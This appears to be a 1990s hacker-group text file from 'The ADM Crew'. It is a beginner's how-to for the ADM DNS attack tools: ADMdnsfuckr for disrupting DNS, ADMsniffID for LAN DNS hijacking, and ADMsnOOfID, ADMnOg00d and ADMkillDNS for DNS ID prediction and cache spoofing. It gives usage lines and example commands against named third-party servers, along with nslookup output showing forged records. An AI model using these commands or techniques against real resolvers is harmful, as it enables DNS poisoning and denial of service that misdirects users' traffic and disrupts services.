o' 'oooooooo' !ooo oooo ooo' 'oooo ooooo' !ooooo oooo oooooo' 'oooo ooooo' !ooooooo oooo oooooooo' 'oooo ooooo' !ooooooooo oooo oooo oooo' 'oooo ooooo' !ooooo ooooo oooo oooo oooo' 'oooo ooooo' !ooooo ooooo oooo oooo oooo' 'oooo ooooo' !ooooo ooooo oooo oooo oooo' 'oooo ooooo !ooooo ooooo oooo oooo oooo' 'oooo ooooo' !ooooo oooo oooo oooo oooo' 'oooo ooooo !ooooo ooo oooo ooooo ooooo' 'oooooooo' !ooooo o oooo humm well i've decided to make a lil howto because the ADMid tools are not very user friendly for a begginer :),illustred with *Real* example... [ehehe btw pleaze excuse muh lame english ;)..] 1: ADMdnsfuckr ADMdnsfuckr is a program to destroy DNS. it's very very simple to use !!! :) usage: ADMdnsfuckr ex: ADMdnsfuckr bob.lenet.fr 2: ADMsniffID ADMsniffID is a DNS hijacker .. you need to have rewt priv.. Ho ehe it's for a LAN only :) usage: ADMsniffID [type 1 or 12 ] ''by type i mean 1 = TYPE A 12 = TYPE PTR'' ex: ADMsniffID eth0 31.3.3.7 www.i.m.mucho.horny.ya 12 ( we hijack TYPE PTR ) so now if som1 does "nslookup " on a network they have :).. [root@ADM root]#nslookup 1.2.3.4 Server: localhost Address: 127.0.0.1 Name: www.i.m.mucho.horny.ya Address: 1.2.3.4 3: --= ADMsnOOfID =-- 1) before you need a rewt on a DNS with auth on a domain. (like shok.janova.org have auth *.janova.org) ADMsnOOfID is a DNS id predictor (but u need to have a rewt on a dns or u need to priv to sniff the DNS ) usage: ADMsnOOfID ex: ADMsnOOfID ppp0 NS2.MCI.NET janova.org shok.janova.org 12 www.i.m.ereet.ya 194.206.23.123 ns2.provnet.fr .. Well after that when u ask NS2.MCI.NET for 194.206.23.123 u have [root@ADM root]#nslookup 194.206.23.123 ns2.mci.net Server: ns2.mci.net Address: 204.70.57.242 Name: www.i.m.ereet.ya Address: 194.206.23.123 [root@ADM root]# we will use ns2.provnet.fr because ns2.provnet.fr has AUTH on 194.206.23.* to find out who has AUTH on 194.206.23.* u just need to do [root@ADM root]#host -t NS 23.206.194.in-addr.arpa 23.206.194.in-addr.arpa name server NS2.PROVNET.FR 23.206.194.in-addr.arpa name server BOW.RAIN.FR 23.206.194.in-addr.arpa name server NS1.PROVNET.FR [root@ADM root]# to know the NS who have AUTH on (for example ) *.provnet.fr do [root@ADM root]#host -t NS provnet.fr provnet.fr name server NS1.provnet.fr provnet.fr name server BOW.RAIN.fr provnet.fr name server NS2.provnet.fr [root@ADM root]# Note: the entry can change!!! u can get NS1 first and when u send a second request u get NS2.. :) Hoo i'm nice today i'give u another example .. for spoof type 1 ADMsnOOfID ppp0 ns.mci.net janova.org shok.janova.org 1 wwwkewlya.provnet.fr 31.3.3.7 ns1.provnet.fr sO.. [root@ADM root]#nslookup wwwkewlya.provnet.fr ns.mci.net Server: ns.mci.net Address: 204.70.128.1 Non-authoritative answer: Name: wwwkewlya.provnet.fr Address: 31.3.3.7 [root@ADM root]# Ok that's ALL for ADMsnOOfID :) 4: ADMnOg00d well with ADMnOg00d u dont need to have any rewt on any DNS ... but it still requires rewt on a BOX it's a DNS ID brutal predictor ( PhEaR !! ) usage: ADMnoG00D [ID] ex: ADMnOg00d ppp45.somewhere.net ns1.provnet.fr provnet.fr taz.cyberstation.fr 12 PheAr.ADM.n0.g00d 194.206.23.144 ns2.provnet.fr 7000 (i' start with ID 7000 because i'know the current ID of taz.cyberstation.fr) i' use ns1.provnet.fr and the domain *.provnet.fr only to find ID sO.. when we have found the ID we can send the REAL spoof So after that we have [root@shok root1]# nslookup 194.206.23.144 taz.cyberstation.fr Server: taz.cyberstation.fr Address: 194.98.136.1 Name: PheAr.ADM.n0.g00d Address: 194.206.23.144 yes i'm nice again i'll u give another example for spoof type 1 ADMnOg00d ppp45.somewhere.net ns1.provnet.fr provnet.fr taz.cyberstation.fr 1 w00c0w.provnet.fr 2.6.0.0 ns1.provnet.fr 7000 after.. nslookup w00c0w.provnet.fr taz.cyberstation.fr ... Server: taz.cyberstation.fr Address: 194.98.136.1 Non-authoritative answer: Name: w00c0w.provnet.fr Address: 2.6.0.0 /* w00w00ify'd w00c0w does ++rool supreme. w00w00ify'd w00c0w does ++rool supreme. w00w00ify'd w00c0w does ++rool supreme. w00w00ify'd w00c0w does ++rool supreme. w00w00ify'd w00c0w does ++rool supreme. w00w00ify'd w00c0w does ++rool supreme. w00w00ify'd w00c0w does ++rool supreme. */ 5: ADMkillDNS ADMkillDNS is a BRUTAL ID spoofer it is the first DNS tools i wrote (write in Ju 97à) the included help in here is very complete no need to talk any more about it {end} Cya Ppl The ADM Crew